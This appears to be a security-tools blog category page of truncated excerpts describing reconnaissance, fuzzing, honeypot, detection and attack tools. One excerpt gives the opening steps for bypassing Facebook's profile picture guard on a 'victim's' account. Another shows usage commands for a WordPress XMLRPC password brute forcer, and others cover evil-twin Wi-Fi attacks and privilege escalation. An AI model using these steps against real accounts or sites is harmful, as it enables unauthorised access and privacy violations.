Browsing category
FOCA (Fingerprinting Organizations with Collected Archives)FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages, and can be downloaded and analysed with FOCA. It is capable of analysing a wide variety of documents, with the most common being Microsoft Office, […]
What is this? Certain characters in passwords (‘O’ and ‘0’, ‘I’ and ‘l’, etc.) can be hard to identify when you need to type them in (and copy-paste is unavailable). Password Lense is a small web application that provides a quick and secure way to get a more informative view of your password. Features […]
snare – Super Next generation Advanced Reactive honEypot Super Next generation Advanced Reactive honEypot About SNARE is a web application honeypot sensor attracting all sort of maliciousness from the Internet. Documentation The documentation can be found here. Basic Concepts Surface first. Focus on the attack surface generation. Sensors and masters. Lightweight collectors (SNARE) and […]
UAC-A-Mola is a tool that allows security researchers to investigate new UAC bypasses, in addition to detecting and exploiting known bypasses. UAC-A-mola has modules to carry out the protection and mitigation of UAC bypasses. The strong point of uac-a-mola is that it was created so that other researchers can carry out the work and process […]
CentOS which stands for Community Enterprise Operating System is one of the most widely used Linux distribution available for free. It powers many web servers across the globe. It is based on Red Hat Enterprise Linux (RHEL). But please note that even though it is based on RedHat Linux, it is not RedHat Linux. It […]
Hey Guys, In this video i show you How to Bypass Facebook Profile Picture Guard. Open the victim’s profile then right click on the page and click view page source. Now search for the entity_id by pressing Ctrl + Fnote- it is nothing but the victim’s profile id in numeric code. Note down the ID […]
yet another dirbuster Common Command line options -a <user agent string> – specify a user agent string to send in the request -c <http cookies> – use this to specify any cookies that you might need (simulating auth). header. -f – force processing of a domain with wildcard results. -l – show the length […]
An XMLRPC brute forcer targeting WordPress written in Python 3. In the context of xmlrpc brute forcing, its faster than Hydra and WpScan. It can brute force 1000 passwords per second. Usage python3 xmlrcpbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt username python3 xmlrpcbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt userlist.txt Bugs If you get an xml.etree.ElementTree.ParseError: Did you forget to add ‘xmlrpc’ […]
Dirstalk is a multi threaded application designed to brute force paths on web servers. The tool contains functionalities similar to the ones offered by dirbuster and dirb. Here you can see it in action: How to use it The application is self-documenting, launching dirstalk -h will return all the available commands with a short […]
Set of tools for security testing of Internet of Things devices using protocols like: CoAP, DTLS, HTCPCP, mDNS, MQTT, SSDP. Installation: Simply clone code from git: https://github.com/Samsung/cotopaxi Requirements: Currently Cotopaxi works only with Python 2.7.x, but future versions will work also with Python 3. If you have previous installation of scapy without scapy-ssl_tls, please remove it or […]
IDA PRO Auto-Renaming Plugin With Tagging Support Features 1. Auto-renaming dummy-named functions, which have one API call or jump to the imported API Before After 2. Assigning TAGS to functions accordingly to called API-indicators inside Sets tags as repeatable function comments and displays TAG tree in the separate view Some screenshots of TAGS view: […]
Gobuster is a tool used to brute-force: URIs (directories and files) in web sites. DNS subdomains (with wildcard support). Virtual Host names on target web servers. Oh dear God.. WHY!? Because I wanted: … something that didn’t have a fat Java GUI (console FTW). … to build something that just worked on the command […]
RITA is an open source framework for network traffic analysis. The framework ingests Bro/Zeek Logs in TSV format, and currently supports the following major features: Beaconing Detection: Search for signs of beaconing behavior in and out of your network DNS Tunneling Detection Search for signs of DNS based covert channels Blacklist Checking: Query blacklists […]
by Gabriel Ryan (s0lst1c3)(gryan[at]specterops.io) EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual […]
Postenum is a clean, nice and easy tool for basic/advanced privilege escalation vectors/techniques. Postenum tool is intended to be executed locally on a Linux box. Be more than a normal user. be the ROOT. USE ./postenum.sh [option] ./postenum.sh -s ./postenum.sh -c Options : -a : All -s : Filesystem [SUID, SGID, Config/DB files, etc.] […]
Basic BIOS emulator/debugger for Unicorn Engine. Written to debug the XEOS Operating System boot sequence. Usage: Usage: unicorn-bios [OPTIONS] BOOT_IMG Options: –help / -h: Displays help. –memory / -m: The amount of memory to allocate for the virtual machine (in megabytes). Defaults to 64MB, minimum 2MB. –break / -b Breaks on a specific address. […]
uniFuzzer is a fuzzing tool for closed-source binaries based on Unicorn and LibFuzzer. Currently it supports fuzzing 32-bits LSB ELF files on ARM/MIPS, which are usually seen in IoT devices. Features very little hack and easy to build can target any specified function or code snippet coverage-guided fuzzing with considerable speed dependence resolved and […]
SMTPTester is a python3 tool to test SMTP server for 3 common vulnerabilities: Spoofing – The ability to send a mail on behalf of an internal user Relay – Using this SMTP server to send email to other address outside of the organization user enumeration – using the SMTP VRFY command to check if […]
These files contain configuration for producing EDR (endpoint detection and response) data in addition to standard system logs. These configurations enable the production of these data streams using F/OSS (free and / or open source tooling.) The F/OSS tools consist of Auditd for Linux; Sysmon for Windows and Xnumon for the Mac. Also included […]
FileSystem Monitor utility that runs on Linux, Android, iOS and OSX. Brought to you by Sergi Àlvarez at Nowsecure and distributed under the MIT license. Contact: [email protected] Usage The tool retrieves file system events from a specific directory and shows them in colorful format or in JSON. It is possible to filter the events […]
DECAF++, the new version of DECAF, taint analysis is around 2X faster making it the fastest, to the best of our knowledge, whole-system dynamic taint analysis framework. This results in a much better usability imposing only 4% overhead (SPEC CPU2006) when no suspicious (tainted) input exists. Even under heavy taint analysis workloads, DECAF++ has […]